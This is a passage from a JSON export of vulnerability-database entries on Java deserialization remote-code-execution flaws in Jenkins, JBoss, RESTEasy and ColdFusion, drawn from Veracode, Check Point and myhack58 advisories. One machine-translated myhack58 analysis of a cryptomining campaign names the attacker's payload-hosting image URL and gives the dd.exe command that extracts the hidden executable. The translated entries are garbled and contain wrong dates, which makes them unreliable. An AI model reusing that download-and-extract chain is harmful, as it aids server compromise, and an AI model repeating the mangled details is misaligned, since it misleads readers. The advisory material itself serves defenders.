"https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-12408/summary", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-04-18T16:16:30", "description": "RESTEasy is vulnerable to remote code execution. SnakeYAML unmarshalling is exploitable for code execution. As RESTeasy uses SnakeYAML and enables the yaml provider by default, under certain conditions, RESTEasy could be forced to parse a request with YamlProvider, resulting in unmarshalling of potentially untrusted data. An attacker can exploit it to execute arbitrary code with the permissions of the application using RESTEasy.\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-12-16T08:05:27", "type": "veracode", "title": "Remote Code Execution (RCE)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9606"], "modified": "2019-05-15T06:18:25", "id": "VERACODE:3126", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-3126/summary", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-04-18T13:17:10", "description": "Jenkins is vulnerable to command injection. The attack exists because it allows an injection of serialized Java object, related to a problematic webapps/ROOT/WEB-INF/lib/commons-collections-*.jar file and the \"Groovy variant in 'ysoserial'\". \n", "cvss3": {}, "published": "2019-05-02T05:21:37", "type": "veracode", "title": "Command Injection", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-8103"], "modified": "2019-12-18T06:27:13", "id": "VERACODE:16660", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-16660/summary", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-04-18T16:13:53", "description": "flex-messenger-core is vulnerable to remote code execution (RCE). The AMF3 deserializers in the library allows the instantiation of arbitrary classes via parameter-less java beans constructors. This allows a malicious user to send a malicious AMF3 object to the system to execute arbitrary code.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-04-06T08:05:24", "type": "veracode", "title": "Remote Code Execution (RCE)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5641"], "modified": "2022-04-19T18:29:52", "id": "VERACODE:3853", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-3853/summary", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-04-18T13:21:32", "description": "jbossas is vulnerable to arbitrary code execution attacks. The vulnerability exists as Jboss Application Server as shipped with Red Hat Enterprise Application Platform 5.2, it was found that the doFilter method in the ReadOnlyAccessFilter of the HTTP Invoker does not restrict classes for which it performs deserialization and thus allowing an attacker to execute arbitrary code via crafted serialized data.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-01-15T09:24:03", "type": "veracode", "title": "Arbitrary Code Execution", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12149"], "modified": "2019-05-15T06:18:28", "id": "VERACODE:12954", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-12954/summary", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "myhack58": [{"lastseen": "2017-10-19T18:33:24", "description": "Adobe ColdFusion in 2017 9 November 12 released a network security update in refer to the previous version, there is a serious deserialization flaws vulnerability bug\uff08CVE-2017-11283, CVE-2017-11284, and may incur long-distance code to fulfill. When applying the Flex integration-do on Remote Adobe LiveCycle Data Management access can be a case were the flaws vulnerability bug impact, the application of the effect will open the RMI-do, the listening port is 1099's. ColdFusion comes with the Java version is too low, not in the deserialization of the previous RMI begging the tools in the examples to stop the inspection. \n360CERT Britain at the end elucidating the verification, confirm the flaws vulnerability bug exact, coherent user as soon as possible to stop the update disposal. \n0x01 impact version \n1. ColdFusion (2016 release) Update 4 and previous versions \n2. ColdFusion 11 Update 12 and earlier versions \n0x02 flaws vulnerability bug application verification \nTo RMI-do transmission structure good payload to make a brief long distance code to perform validation. \n! [](/Article/UploadPic/2017-10/201710192392498. png? www. myhack58. com) \n0x03 repair plan \n1. On the governance page closed Remote Adobe LiveCycle Data Management access \n2. Into has latest patch ColdFusion (2016 release) Update 5, ColdFusion 11 Update 13\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2017-10-19T00:00:00", "type": "myhack58", "title": "Adobe ColdFusion arbitrary command execution flaws vulnerability 0day(CVE\u20132017\u201311283, CVE\u20132017\u201311284)early warning-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11283", "CVE-2017-11284"], "modified": "2017-10-19T00:00:00", "id": "MYHACK58:62201789628", "href": "http://www.myhack58.com/Article/html/3/62/2017/89628.htm", "sourceData": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-03-15T15:17:59", "description": "BAT represents the use of the Internet to make a fortune the Bright Side, the dark side of the Black output is also exhausted their imagination to maximize your own gain, and in this regard the Black output can be described as the eight Immortals crossing the sea, each show its can. Have to steal data to resell to achieve financial freedom, timely close hand the end up in this life eat and drink not anxious, insatiable in recent increasingly severe blow under the last to eat the prison meal. In addition to the data on the idea, we see also by the extraction device calculates the ability to send some small fortune, recently, days eye lab tracking some through the use of these NDay vulnerabilities to attack the server to obtain control of the automated implantation mining Trojan of the gang, to everyone analysis of a real case. \nHope this little exposure can cause some administrators to Wake up, check your server whether the presence of vulnerabilities, clear the already present in the machine of the malicious code if the vulnerability exists almost certainly have been invaded control, guarantee data and service security. \nJava-based Web applications Server had been out a few very easy to use remote command execution vulnerability, such as the following two: \nCVE-2015-7450 \nIBM WebSphere Java Comments Collections component deserialization vulnerability\nCVE-2015-4852 \nOracle WebLogic Server Java deserialization vulnerability\nVulnerability details it is not here analyzed. Although the technical details and the use of the tool have been disclosed for almost 2 years, but now on the Internet there is also a large number of these vulnerabilities[Web server](<http://www.myhack58.com/Article/sort099/sort0100/Article_100_1.htm>), and these servers will sooner or later become the attacker's prey. As for the controlled machine will be used to do what exactly it is that attackers will have data that will inevitably be stolen scalping, in addition to this, the server generally has very good hardware configuration, mass storage, high-speed CPU and network connection, and now the price of bitcoin is relatively high, get the server to mining make full use of its computing capacity is also considered black produced of a chicken to eat for the benefit of its own way. \nCase \nBlack output scan IP segment found open a specific port of the server, to confirm the presence of vulnerabilities the Web Application Server exploit control server after downloading a bitcoin mining malware picture, the analysis execution, the server will transition to a mining of broiler chickens. \n! [](/Article/UploadPic/2017-3/2017315211310444. png? www. myhack58. com) \nSample from our set up a honeypot, the server open the WebLogic services http://xxx.xx.xx.xxx:7001/: the \n! [](/Article/UploadPic/2017-3/2017315211311260. png? www. myhack58. com) \nThe Log analysis revealed the attacker advantage exists in the WebLogic application server in Java deserialization vulnerability to compromise the server. Get control later, the attacker first executes a script, the script used to download the implementation of a named regedit. exe program, this program will call the powershell. exe to execute the following powershell script: \n! [](/Article/UploadPic/2017-3/2017315211312713. png? www. myhack58. com) \npowershell code as shown below: \n! [](/Article/UploadPic/2017-3/2017315211312591. png? www. myhack58. com) \n\u811a\u672c \u9996\u5148 \u4f1a \u53bb \u5f00\u6e90 \u7684 \u7f51\u7ad9 \u53bb \u4e0b\u8f7d \u5de5\u5177 \u7a0b\u5e8f dd.exe use it to write the file, for most of the main anti-mollusc, dd. exe will be marked as white, and therefore the use of the tool can bypass the part of the detection operation, The lower figure for the dd. exe introduction: \n! [](/Article/UploadPic/2017-3/2017315211312114. png? www. myhack58. com) \n\u811a\u672c \u8fd8 \u4f1a \u53bb https://ooo.0o0.ooo/2017/01/22/58842a764d484.jpg to download a jpg picture: \n! [](/Article/UploadPic/2017-3/2017315211312785. png? www. myhack58. com) \nAnd https://ooo. 0o0. ooo/ this site itself is a host for user uploaded files outside the chain of address: \n! [](/Article/UploadPic/2017-3/2017315211312429. png? www. myhack58. com) \nThe website interface as shown in Figure, upload the maximum file limit of 5MB to: \n! [](/Article/UploadPic/2017-3/2017315211312244. png? www. myhack58. com) \nDownload back picture size is 1. 44M, which is of course not just one picture: \n! [](/Article/UploadPic/2017-3/2017315211313104. png? www. myhack58. com) \nThe analysis found that the image offset 0xd82\uff083458 at the start of a PE file: \n! [](/Article/UploadPic/2017-3/2017315211313727. png? www. myhack58. com) \nFinally, the script calls the dd. exe put the picture in the PE file is extracted, \u5e76\u547d\u540d\u4e3amsupdate.exe to: dd.exe if=favicon.jpg of=msupdate.exe skip=3458 bs=1. The \nThe separated PE is a self-extracting file; \n! [](/Article/UploadPic/2017-3/2017315211313210. png? www. myhack58. com) \n\u8fd0\u884c \u89e3\u538b \u540e \u4f1a \u53bb \u6267\u884c msupdate.exe to: \n! [](/Article/UploadPic/2017-3/2017315211313793. png? www. myhack58. com) \nmsupdata. exe itself or a self-extracting file: \n! [](/Article/UploadPic/2017-3/2017315211313616. png? www. myhack58. com)\n\n**[1] [[2]](<84367_2.htm>) [next](<84367_2.htm>)**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-03-15T00:00:00", "type": "myhack58", "title": "The use of server vulnerability mining black production case study-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450", "CVE-2015-4852"], "modified": "2017-03-15T00:00:00", "id": "MYHACK58:62201784367", "href": "http://www.myhack58.com/Article/html/3/62/2017/84367.htm", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-02-05T09:00:41", "description": "Source: [gone with the wind's Blog](<https://www.iswin.org/2017/01/25/Jenkins-LDAP-Deserializable-Vulnerablity-CVE-2016-9299-Analysis/>)\n\nAuthor: [iswin](<https://www.iswin.org/about>)\n\nThis vulnerability in the last 11 month of official release announcement when I was concerned too, when he was looking for com. sun. jndi. ldap. LdapAttribute this class related to the deserialization was aware of this category inside the _getAttributeSyntaxDefinition()_ method and _getAttributeDefinition()_ there may be a deserialization problem, but at the time looking for a lot of classes, found in the sequence of time can trigger these two methods, the original thought is the jdk inside their own problems, and finally it didn't continue to talk down, Midway has Gaijin released a ppt inside presentation this vulnerability, probably looked under found is to use json to bypass Jenkins White List, The time has been busy with data analysis of things, things just ran aground, and shortly before just the MSF on the Payload, plus end up not so many things, so studied, this vulnerability was quite interesting, to the knowledge of the surface or slightly wide a bit, here have to admire those vulnerabilities found.\n\nWhenever a vulnerability is a vulnerability appears, I got to thinking why yourself can not be found, when every time a vulnerability analysis of the complete time only to find aspects of the gap really is not small.\n\n#### Technology is to share, so in order to progress.\n\n### Vulnerability description\n\n2016 11 May 16, Jenkins official released a security announcement, named [CVE-2016-9299](<https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2016-11-16>) ,from the advertisement point of view, the vulnerability is still a reverse sequence of vulnerability, but this vulnerability deserialization and LDAP, but in the reverse sequence after the need to connect to a malicious LDAP server, Jenkins for before deserialization method of repair is for some malicious class to add a blacklist, so here first of all have to Bypass the official blacklist, for the vulnerability is only so much information, and in the official to the POC inside also merely referred to the com. sun. jndi. ldap. LdapAttribute this class, this vulnerability using the first authentication is not required, but can be arbitrary code execution, harm the evident.\n\n### Vulnerability analysis\n\nFrom the official description as well as the back of the Payload point of view, the problem and the net. sf. json and the com. sun. jndi. ldap. LdapAttribute about, through the analysis of the LdapAttribute for this class of analysis, we can determine the following two methods are trigger deserialization vulnerability the root on the below LDAP reverse sequence-related knowledge please 16 years blackhat foreigners of the Paper \u201cus-16-Munoz-A-Journey-From-the JNDI-LDAP-Manipulation-To-RCE\u201dto\n\n* getAttributeSyntaxDefinition\n* getAttributeDefinition\n\nThese two methods are invoked the _DirContext schema = getBaseCtx(). getSchema(rdn);_ code fragment which getBaseCtx()method is defined as follows:\n\n! [](/Article/UploadPic/2017-2/201724165543569. png)\n\nThe sections of the code using jndi way to access the LDAP service, where we can control the Context. PROVIDER_URL parameters, thereby controlling the jndi to access the LDAP server address.\n\ngetSchema(rdn)method will eventually call the com. sun. jndi. ldap. LdapBindingEnumeration. createItem(String, Attributes, Vector) method to call the relationship too much, your go to debug, the method is defined in the following figure\n\n! [](/Article/UploadPic/2017-2/201724165544831. png)\n\nIn this method will eventually call Obj. decodeObject(attrs) method, in order to achieve the object deserialization. Here a little mention, com. sun. jndi. ldap. Obj object defines several object serialization and deserialization methods, there is a direct deserialization, but also directly through the remote loading, here is the deserialization a little with the deserialization of different points that we can't remote loading of objects, because com. sun. jndi. ldap. VersionHelper12. trustURLCodebase the default value is false, it directly determines the class loader can only load the current classpath the following class, on how to construct the object so that the LDAP in the deserialization can execute arbitrary code, see below.\n\nHere we know the com. sun. jndi. ldap. LdapAttribute related to the method can trigger a deserialization exploit, so now we have to do is go find a class at deserialization time can call we accordingly trigger the vulnerability function, that is, in the deserialization can call getAttributeSyntaxDefinition method or getAttributeDefinition method of the class, by a foreigner of the PPT and open the gadgets, we slightly analysis you'll find on the net. sf. json, this class library exists can call the class any of the getXXX functions in the place, then com. sun. jndi. ldap. LdapAttribute this class in the getXXX method is not also can through this way to call, first of all, we first determine what exactly is that class of that method can call the getXXX function, by the gadgets in the json Payload we find that eventually calls the object's getXXX function is as follows figure net. sf. json. JSONObject. defaultBeanProcessing(Object, JsonConfig) is shown in\n\nOn the figure circled the two places that can call the getXXX function of the place, here will first traverse the JavaBeans of all the attributes, the last in the door-to-Door calls.\n\nFigured out able to function call the root causes, the next step is to find this function exactly what will trigger. By eclipse we can easily find the following call.\n\n! [](/Article/UploadPic/2017-2/201724165544409. png)\n\nAs shown in the above figure, we can see defaultBeanProcessing method will eventually be ConcurrentSkipListSet class in the equals method calls, to many people here might ask, so many call the relationship, why are you just looking for this class's equals method here might have some experience on the inside, because for and the equals method associated things too much, for java in some data structure, such as a Set,each time adding the element of time will determine whether the current key is present, there is compare whether two objects are equal when to call the hashcode and equals method, here if know through other deserialization of the students on this may be slightly touched, such as the jdk that deserialization of the trigger process. If this experience is not the case, then you can only one one to find.\n\n**[1] [[2]](<83274_2.htm>) [[3]](<83274_3.htm>) [[4]](<83274_4.htm>) [next](<83274_2.htm>)**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-02-04T00:00:00", "type": "myhack58", "title": "Jenkins-LDAP (CVE-2016-9299) deserialization vulnerability analysis-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9299"], "modified": "2017-02-04T00:00:00", "id": "MYHACK58:62201783274", "href": "http://www.myhack58.com/Article/html/3/62/2017/83274.htm", "sourceData": "", "cvss": {"score": 0.0, "vector": "NONE"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T11:32:33", "description": "An invocation layer deserialization vulnerability exists in Red Hat JBoss Seam Framework. A remote unauthenticated attacker may exploit this vulnerability by sending a crafted file to the web application.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-12-13T00:00:00", "type": "checkpoint_advisories", "title": "JbossMQ Invocation Layer Deserialization Remote Code Execution (CVE-2017-12149; CVE-2017-7504)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12149", "CVE-2017-7504"], "modified": "2017-12-13T00:00:00", "id": "CPAI-2017-1066", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-17T11:31:59", "description": "An insecure deserialization vulnerability exists in the Flex integration service of Adobe ColdFusion. The vulnerability is due to the lack of input validation by the DataServicesCFProxy. A successful attack could lead to a remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2017-11-27T00:00:00", "type": "checkpoint_advisories", "title": "Adobe ColdFusion DataServicesCFProxy Insecure Deserialization (CVE-2017-11283)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11283"], "modified": "2018-01-03T00:00:00", "id": "CPAI-2017-1019", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-17T11:27:24", "description": "A vulnerability exists in Adobe ColdFusion. Successful exploitation of this vulnerability could allow a remote attacker to damage users system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2018-04-15T00:00:00", "type": "checkpoint_advisories", "title": "Adobe ColdFusion Insecure Deserialization - Ver2 (CVE-2017-11284)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11284"], "modified": "2018-07-31T00:00:00", "id": "CPAI-2018-0799", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-17T11:32:08", "description": "An insecure deserialization vulnerability exists in the Flex integration service of Adobe ColdFusion. The vulnerability is due to the lack of input validation on objects in the RMI Registry before deserializing them. A remote, unauthenticated attacker can exploit this vulnerability by sending maliciously crafted serialized data to the target application.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2017-10-29T00:00:00", "type": "checkpoint_advisories", "title": "Adobe ColdFusion RMI Registry Insecure Deserialization (CVE-2017-11284)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11284"], "modified": "2017-11-21T00:00:00", "id": "CPAI-2017-0884", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-13T22:27:51", "description": "A command Injection vulnerability exist in Jenkins. The vulnerability is due to lack of serialized object validation. Successful exploitation could allow an attacker to execute arbitrary code in the target machine.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-02-15T00:00:00", "type": "checkpoint_advisories", "title": "Jenkins CI Unauthenticated Remote Code Execution (CVE-2017-1000353)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000353"], "modified": "2018-02-15T00:00:00", "id": "CPAI-2018-0130", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-17T11:29:05", "description": "A Remote Code Execution vulnerability exists within Red Hat Jboss application server. This is due to the way the Jboss Application Server handles its Read Only Access filter. A successful attacker could run arbitrary code on the machine.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-01-07T00:00:00", "type": "checkpoint_advisories", "title": "Red Hat Jboss Application Server Remote Code Execution (CVE-2017-12149)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": 